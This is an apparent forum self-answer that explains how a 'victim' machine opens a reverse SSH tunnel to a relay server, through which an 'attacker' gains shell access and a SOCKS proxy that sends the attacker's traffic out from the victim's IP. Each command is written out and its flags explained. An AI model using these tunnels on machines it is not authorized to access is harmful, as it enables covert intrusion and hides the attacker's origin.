Apparently nobody can answer this question, that's okay because I found the answer myself.
Here is the answers:
- On victim:
ssh -N -f -R 5555:localhost:22 -p <port_of_serv> <ip_of_serv>
- On attacker #1:
ssh (-N -f) -L 4444:localhost:5555 -p <port_of_serv> <ip_of_serv>
- On attacker #2:
ssh -p 4444 -D localhost:3333 user_on_victim@localhost
- On attacker #3: in Firefox or irc, or even for the General network settings: Socks (v5) proxy settings: 127.0.0.1 port 3333
Every application you set the host localhost with port 3333 up for will be tunneled via serv to the victim and when you visit something like http://myip.com you'll see the ip/host of the victim.
From here on you can even use GUI applications on the attacker (if you setup socks settings for the specific app or for the system as a whole) which will be tunneled via serv to victim and you'll act as the victim as such.
The mistake I made in my thought process was that I didn't really understand the way the reversed port scheme looks like, I will try to explain it in simple terms.
Victim action
ssh -N -f -R 5555:localhost:22 -p <port_of_serv> <ip_of_serv>
-N = I'm not going to run commands in the shell-f = put the process in the background (so you can close the terminal window)-R = reversed tunnel5555:localhost:22 = 5555 is the port on which serv internally is listening to put data forward to port 22 on victim. If you've setup victim to have ssh run on port 2222 you should change 22 to 2222. -p = port on which ssh on serv is running.
1st attack action
ssh (-N -f) -L 4444:localhost:5555 -p <port_of_serv> <ip_of_serv>`
The 1st command you make on attacker (-L 4444:localhost:5555) will set up a tunnel so that your connection with your 3rd command will be tunneled right thrue to victim. (This is just for Dynamic port forwarding / Socks applications)
If you just want to have shell access on victim instead of this command you just ssh in to serv & than run command: 'ssh user_on_victim@localhost -p 5555'.
But we don't want shell access, we want to tunnel all data dynamically so we have to make a port-forward.
Or the schematic explanation
-L = local port-forwarding (on serv)- 4444:localhost:5555 put all data coming in on port 4444 to port 5555.
2nd attack action
The 2nd command you make on attacker
ssh -p 4444 -D localhost:3333 user_on_victim@localhost
is the actual command that's going to initialise the connecting through the 2 tunnels. What you do is you say: connect to port 4444 and put all the data that's coming in on (localhost port 3333) to 4444. (which will be put through locally on serv to port 5555 -> which will be pushed out to port 22 on victim.
Or the schematic explanation
-D = Dynamic forwardinglocalhost:3333 = listen on port 3333 and push data through ssh connection to port 4444 to serv. -p 4444 = the port on which serv is listening to put the data forward to port 5555 and than out to port 22 on victim.
3rd attack action
Setup your applications or even your entire system to use SOCKS (v5) proxy server on address: localhost port: 3333. It does not matter on which ports these applications run normally because that will be handled by the proxy server. In theory every application can run via socks proxy dynamic port forwarding. You'll only have to set it up. :)
The 3rd action on attacker is the actual data you're going to tunnel to victim. It does not matter what data or application this is, that's why it's dynamic forwarding, it does not matter on which ports these application run because that will be handled by SOCKS.
I hope someone finds use in my explanation.
Have a nice day....
